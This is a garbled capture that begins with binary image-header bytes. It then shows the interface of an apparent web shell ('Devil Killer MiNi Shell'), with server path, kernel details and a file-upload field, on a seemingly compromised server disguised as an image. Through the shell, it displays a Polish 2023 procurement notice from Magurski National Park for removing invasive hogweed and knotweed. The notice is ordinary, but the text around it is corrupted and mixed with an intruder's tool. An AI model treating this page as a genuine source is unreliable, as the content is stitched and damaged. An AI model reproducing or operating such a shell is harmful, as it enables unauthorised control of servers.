JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230509/0020732801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zwalczanie roślin inwazyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Magurski Park Narodowy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180789309</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krempna 59</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krempna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-232</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134414099</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mpn@magurskipn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.magurskipn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zwalczanie roślin inwazyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bc856c8f-ed84-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00207328</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00174571/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zwalczanie roślin inwazyjnych (barszczu sosnowskiego i rdestowca japońskiego)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie współfinansowane jest w ramach Programu „Środowisko, energia i zmiany klimatu” ze środków Mechanizmu Finansowego Europejskiego Obszaru Gospodarczego 2014-2021 i Budżetu Państwa, w oparciu o dotację projektu „Zintegrowane podejście do ochrony ekosystemów przed inwazyjnymi roślinami obcymi w południowej Polsce – IAS/EcoSystemCARE”, umowa nr MF EOG 07.02.02-50-0032_21-00. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-bc856c8f-ed84-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/<br/>http://magurskipn.pl/index.php?d=przetargi&amp;art=1680<br/>drogą elektroniczną za pośrednictwem poczty elektronicznej pod adresem: zamowienia@magurskipn.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt . Ofertę, a także oświadczenie o jakim mowa w Rozdziale 7 ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym .<br/>Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1) drogą elektroniczną za pośrednictwem:<br/>- poczty elektronicznej pod adresem: zamowienia@magurskipn.pl<br/>2) poprzez Platformę e-zamowienia, dostępną pod adresem: https://ezamowienia.gov.pl/pl<br/>Postępowanie można wyszukać ze strony głównej Platformy e-zamówienia poprzez kafelek „Przeglądaj postępowania/konkursy”<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać aktywne konto podmiotu „Wykonawca” na Platformie e-zamowienia. Wykonawca posiadający konto na Platformie e-zamowienia będzie miał dostęp do formularzy służących do komunikacji z Zamawiającym oraz do formularzy umożliwiających złożenie lub wycofanie oferty.<br/>UWAGA – Wykonawca powinien dokładnie zapoznać się z instrukcją zakładania konta użytkownika, dostępną na Platformie e-zamowienia, kafelek „Centrum pomocy”<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w „Instrukcji użytkowania systemu” https://ezamowienia.gov.pl/pl/instrukcje oraz w ”Regulaminie Platformy e-zamowienia”, dostępnym na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin oraz informacje zamieszczone w zakładce „ Centrum pomocy”.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy<br/>e-zamowienia wynosi 150 Mb. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z Platformy e-zamowienia oraz wymagania dotyczące specyfikacji połączenia określa „Regulamin Platformy e-zamowienia” Za datę przekazania oferty przyjmuje się datę jej przekazania na Platformę e-zamowienia, a za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych informacji przyjmuje się datę ich przekazania na Platformę e-zamowienia, a w przypadku przekazania tych dokumentów oraz informacji za pomocą poczty elektronicznej - datę potwierdzenia dostarczenia wiadomości zawierającej dokument/informację z serwera pocztowego Zamawiającego. Dokumenty związane z postępowaniem będą publikowane na stronie internetowej Zamawiającego: http://magurskipn.pl/index.php?d=przetargi&amp;sk=1 Zamawiający informuje , że w niniejszym postępowaniu nie zachodzą przesłanki określone w art. 65 ust 1, art. 66 o art. 69 ustawy pzp. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania: ZP–370–6-1/23 . Jeżeli Zamawiający i Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje przy pomocy poczty elektronicznej, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. W przypadku braku potwierdzenia otrzymania wiadomości przez Wykonawcę, Zamawiający będzie uważał, iż pismo wysłane przez Zamawiającego na adres e-mail Wykonawcy zostało doręczone w sposób umożliwiający zapoznanie się z jego treścią.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r., w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Magurski Park Narodowy z siedzibą w Krempnej; Krempna 59 38-232 Krempna, tel. 13 441 40 99, e-mail: dyrekcja@magurskipn.pl<br/>2. Kontakt z inspektorem ochrony danych osobowych w Magurskim Parku Narodowym – adres e-mail: iod@magurskipn.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z zapytaniem ofertowym pn.: „Zwalczanie roślin inwazyjnych.<br/>4. Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; w przypadku postępowań dotyczących zamówień finansowanych ze środków Programu Operacyjnego Infrastruktura i Środowisko – przez okres 5 lat od daty zakończenia projektu.<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy p.z.p.<br/>5. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>d) Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-370-1-6/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa polegająca na usuwaniu dwóch gatunków obcych i inwazyjnych – barszczu Sosnowskiego i rdestowca japońskiego na terenie Magurskiego Parku Narodowego.<br/>Zadanie podzielone zostało na dwie części:<br/><br/>Część 1. Usuwanie barszczu Sosnowskiego<br/>Część 2. Usuwanie rdestowca japońskiego<br/><br/>Część 1. Usuwanie barszczu Sosnowskiego<br/>Przedmiotem zamówienia jest trzykrotne usuwanie barszcz Sosnowskiego na wskazanych przez Zamawiającego powierzchniach poprzez zastosowanie metody polegającej, na przecinaniu szyjki korzeniowej na głębokości minimum 15-25 cm przy użyciu szpadla (w przypadku osobników dorosłych) wraz ze ścięciem osobników oraz – jeśli będą obecne - wyrywaniu siewek. Zabiegi te należy powtórzyć 3-krotnie w ciągu sezonu wegetacyjnego, począwszy od pierwszej połowy lipca. Po wykonaniu zabiegu należy wyrównać powierzchnię a pozostałą biomasę złożyć w miejscach wskazanych przez pracownika Zamawiającego.<br/>Wykonawca nie może dopuścić do wytworzenia i rozsiania się nasion. Ponieważ prace będą wykonywane już w fazie kwitnienia barszczy, usuwanie osobników należy poprzedzić ścięciem kwiatostanów i ich zabezpieczeniem poprzez zapakowanie w szczelne worki foliowe. Worki należy składować w miejscu wskazanym przez Zamawiającego a następnie dowieźć w miejsce wskazane przez Zamawiającego (na terenie MPN), gdzie będą składowane.<br/>Termin wykonania:<br/> Etap 1 - do 15 lipca 2023 r. – pierwsze przycinanie.<br/> Etap 2 - do 15 sierpnia 2023 r. – drugie przycinanie.<br/> Etap 3 - do 15 października 2023 r. – trzecie przycinanie.<br/><br/>Zredukowana powierzchnia, na której będzie wykonywany zabieg wynosi 3 ha +/- 10%.<br/>Zestawienie działek ewidencyjnych, na których będzie prowadzony zabieg zamieszczono w tabeli poniżej. Załącznik graficzny nr 1 pokazuje miejsca planowanych prac na tle ortofotomapy i granic Magurskiego PN.<br/><br/>Nr. działki Obręb ewidencyjny Nazwa zwalczanego gatunku<br/>583/3 Krempna Barszcz Sosnowskiego<br/>534 Krempna Barszcz Sosnowskiego<br/>944/1 Myscowa Barszcz Sosnowskiego<br/>1058/1 Myscowa Barszcz Sosnowskiego<br/>1056/1 Myscowa Barszcz Sosnowskiego<br/>1039/1 Myscowa Barszcz Sosnowskiego<br/>1055/1 Myscowa Barszcz Sosnowskiego<br/>1052/1 Myscowa Barszcz Sosnowskiego<br/>1045/1 Myscowa Barszcz Sosnowskiego<br/>1039/2 Myscowa Barszcz Sosnowskiego<br/>937/2 Myscowa Barszcz Sosnowskiego<br/>465/4 Polany Barszcz Sosnowskiego<br/>40/190 Kotań Barszcz Sosnowskiego<br/>40/198 Kotań Barszcz Sosnowskiego<br/><br/><br/>Uwaga:<br/>• Termin zakończenia kolejnych etapów zwalczania barszczu Sosnowskiego zostały podane w przybliżeniu i mogą ulec zmianie.<br/>• Wykonanie prac przewidzianych w poszczególnych etapach jest uzależnione od stopnia rozwoju roślin, dlatego też Zamawiający zastrzega sobie prawo do przyspieszenia lub opóźnienia ich terminu.<br/>• O konieczności rozpoczęcia prac Wykonawca zostanie powiadomiony (tel./mail) na minimum 1 tydzień przed wejściem w teren.<br/><br/>Część 2. Usuwanie rdestowca japońskiego<br/>Przedmiotem zamówienia jest usuwanie rdestowca japońskiego przez 3-krotne koszenie na wskazanych przez Zamawiającego powierzchniach w Magurskim Parku Narodowym.<br/>Prace należy wykonywać przy użyciu sprzętu ręcznego lub ręcznych narzędzi mechanicznych, tj. wykaszarek, tasaków (należy stosować noże metalowe: trójząb, tarcza 2-, 3- lub 4-zębna). Biomasę powstałą z części nadziemnych należy pozostawić do wysuszenia (ok. 6 tygodni) w postaci pryzm, w miejscach uzgodnionych z pracownikami Magurskiego PN sprawującymi nadzór przyrodniczy. Pryzmy składować w miejscach nie narażonych na zalanie, nasłonecznionych i przewiewnych, gdzie nie ma intensywnej penetracji ludzi. Biomasę pozostawić do wysuszenia, a następnie rozdrobnić, rozplantować w rejonie działań. Zebrana biomasa (tj. pędy nadziemne rdestowca) powinna być odizolowana od podłoża i ułożona na nieprzepuszczalnym materiale (na folii, plandece itp.), dodatkowo przykryta od góry siatką oczkową (15 × 15 mm) zabezpieczającą przed przypadkowym rozwlekaniem przez m.in. wiatr czy zwierzęta.<br/>Termin wykonania:<br/> Etap 1 - do 15 lipca 2023 r. – pierwsze koszenie i pryzmowanie.<br/> Etap 2 - do 15 sierpnia 2023 r. – drugie koszenie i pryzmowanie.<br/> Etap 3 - do 30 września 2023 r. – trzecie koszenie, pryzmowanie i rozplantowanie (rozplantowanie dotyczy biomasy z etapu 1 i 2).<br/> Etap 4 – do 15 listopada 2022 r. – rozplantowanie (rozplantowanie dotyczy biomasy z etapu 3).<br/><br/>Obowiązkiem Wykonawcy będzie również kontrola a w razie potrzeby poprawa mocowania stalowej siatki jakiej użyto w ubiegłorocznym sezonie wegetacyjnym do zwalczania rdestowca japońskie na powierzchni ok 100 m2 . Do mocowania siatki należy użyć szpilek o średnicy co najmniej 6 mm i długości min. 50 cm, wykonanych najlepiej z prętów żebrowanych, w kształcie litery J, U, T. oraz wkrętów do drewna z podkładkami o średnicy większej niż oczko siatki przykręcanych do drewnianych łat.<br/><br/><br/>Zredukowana powierzchnia, na której będzie wykonywany zabieg wynosi 3 ha +/- 10%.<br/>Zestawienie działek ewidencyjnych, na których będzie prowadzony zabieg zamieszczono w tabeli poniżej. Załącznik graficzny nr 2 pokazuje miejsca planowanych prac na tle ortofotomapy i granic Magurskiego PN.<br/><br/>Nr. działki Obręb ewidencyjny Nazwa zwalczanego gatunku<br/>1839/5 Cieklin Rdestowiec japoński<br/>2181 Pielgrzymka Rdestowiec japoński<br/>2196 Pielgrzymka Rdestowiec japoński<br/>2183 Pielgrzymka Rdestowiec japoński<br/>2186 Pielgrzymka Rdestowiec japoński<br/>366/2 Folusz Rdestowiec japoński<br/>2188 Pielgrzymka Rdestowiec japoński<br/>2192 Pielgrzymka Rdestowiec japoński<br/><br/>Uwaga:<br/>• Termin zakończenia kolejnych etapów zwalczania rdestowca japońskiego zostały podane w przybliżeniu i mogą ulec zmianie.<br/>• Wykonanie prac przewidzianych w poszczególnych etapach jest uzależnione od stopnia rozwoju roślin, dlatego też Zamawiający zastrzega sobie prawo do przyspieszenia lub opóźnienia ich terminu.<br/>• Kontrola a w razie potrzeby poprawa mocowania stalowej siatki jakiej użyto do zwalczania rdestowca japońskiego w ubiegłym roku zostanie wykonana w ramach 1 Etapu prac.<br/>• O konieczności rozpoczęcia prac Wykonawca zostanie powiadomiony (tel./mail) na minimum 1 tydzień przed wejściem w teren.<br/>Przy wykonywaniu zabiegów będzie prowadzony nadzór przyrodniczy przez pracowników Magurskiego Parku Narodowego.<br/>Wykonawca uwzględnia w cenie oferty zakup wszystkich materiałów (folii, plandek, worków, siatki nylonowej, kotew, wkrętów itp.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77312100-1 - Usługi odchwaszczania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska największą liczbę punktów w kryterium cena - 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, wykonał przynajmniej jedną usługę polegającą na zwalczaniu roślin gatunków inwazyjnych i potwierdzi to referencjami/kserokopią podpisanego bez zastrzeżeń protokołu odbioru - Wzór wykazu wykonywanych usług stanowi załącznik nr 4 do SWZ <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>Załącznik nr 2 – Oświadczenie o braku podstaw do wykluczenia<br/>Załącznik nr 3 – Oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania 